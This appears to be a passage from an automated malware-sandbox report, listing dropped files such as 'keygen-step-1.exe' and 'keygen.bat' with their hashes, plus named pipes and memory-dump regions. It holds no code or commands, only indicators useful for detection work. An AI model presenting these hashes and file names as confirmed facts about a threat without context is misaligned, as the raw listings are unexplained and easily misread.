                                                                                                                                                                                                                                                                        e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                                                                                                      • \??\pipe\crashpad_5108_QIVEPKSBTVMNZAAW
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                      • \??\pipe\crashpad_784_TRCWHBKFNDNWRSDA
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                      • memory/60-259-0x00000221E1DA0000-0x00000221E1E10000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/208-306-0x000000000463E000-0x000000000473F000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                      • memory/208-307-0x0000000002C00000-0x0000000002D4A000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                                      • memory/224-291-0x0000000002A10000-0x0000000002A12000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/520-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/708-283-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/924-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/960-301-0x0000000003F20000-0x000000000406A000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                                      • memory/1028-268-0x0000012E5A400000-0x0000012E5A470000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/1104-266-0x000002303E2B0000-0x000002303E320000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/1224-274-0x0000023396D60000-0x0000023396DD0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/1392-276-0x0000027288860000-0x00000272888D0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/1468-270-0x0000019D24FD0000-0x0000019D25040000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/1584-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/1816-253-0x000001DC687C0000-0x000001DC68830000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/1816-252-0x000001DC68700000-0x000001DC6874B000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        300KB

                                                                                                                                                                                                                                                                      • memory/1840-286-0x0000000002250000-0x0000000002252000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/1884-272-0x000001CDDE810000-0x000001CDDE880000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2136-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/2320-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/2348-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/2484-262-0x00000297CB540000-0x00000297CB5B0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2532-264-0x000002BBCA740000-0x000002BBCA7B0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2608-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/2688-278-0x000001A8E3E60000-0x000001A8E3ED0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2696-280-0x0000025BCB390000-0x0000025BCB400000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2836-304-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        3.5MB

                                                                                                                                                                                                                                                                      • memory/2936-311-0x000001EBF4480000-0x000001EBF44F0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2936-255-0x000001EBF4410000-0x000001EBF4480000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/2936-308-0x000001EBF3EA0000-0x000001EBF3EEB000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        300KB

                                                                                                                                                                                                                                                                      • memory/3080-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/3188-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/3532-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/3532-123-0x00007FFE15130000-0x00007FFE15131000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/3600-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/3832-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/3868-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/3984-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4120-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4128-250-0x000000000064C000-0x000000000074D000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                      • memory/4128-251-0x0000000004210000-0x000000000426C000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        368KB

                                                                                                                                                                                                                                                                      • memory/4160-258-0x00000266AB340000-0x00000266AB3B0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                      • memory/4160-288-0x00000266ADA00000-0x00000266ADAFF000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1020KB

                                                                                                                                                                                                                                                                      • memory/4200-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4312-293-0x00000000030C0000-0x00000000030C2000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/4312-298-0x00000000030C5000-0x00000000030C6000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/4312-294-0x00000000030C2000-0x00000000030C4000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/4328-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4356-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4400-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4404-296-0x0000000002BF5000-0x0000000002BF7000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/4404-292-0x0000000002BF0000-0x0000000002BF2000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/4404-295-0x0000000002BF2000-0x0000000002BF4000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/4404-297-0x0000000002BF4000-0x0000000002BF5000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/4424-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4556-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4576-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4580-303-0x00000000035F0000-0x0000000003638000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        288KB

                                                                                                                                                                                                                                                                      • memory/4580-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4584-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4584-249-0x0000000002C50000-0x0000000002DEC000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                                                      • memory/4588-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4592-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4736-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4740-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4804-284-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        57.9MB

                                                                                                                                                                                                                                                                      • memory/4804-282-0x0000000004270000-0x0000000004301000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        580KB

                                                                                                                                                                                                                                                                      • memory/4816-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4848-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4872-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4884-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4892-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4900-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4908-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4916-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4924-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4940-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4952-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4952-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4964-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/4992-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5024-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5048-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5056-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5060-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5068-290-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/5084-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5088-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5104-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5108-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5112-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5116-261-0x000000001B1F0000-0x000000001B1F2000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                      • memory/5156-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5220-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5268-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5328-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5392-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5512-281-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        172KB

                                                                                                                                                                                                                                                                      • memory/5556-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5600-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5632-305-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        7.0MB

                                                                                                                                                                                                                                                                      • memory/5632-287-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        17.3MB

                                                                                                                                                                                                                                                                      • memory/5632-285-0x00000000046D0000-0x00000000057D2000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        17.0MB

                                                                                                                                                                                                                                                                      • memory/5736-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5776-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5844-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5860-300-0x00000000004B0000-0x000000000055E000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        696KB

                                                                                                                                                                                                                                                                      • memory/5860-299-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                                                      • memory/5892-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5912-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/5920-302-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        284KB

                                                                                                                                                                                                                                                                      • memory/5952-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                      • memory/6140-289-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        88KB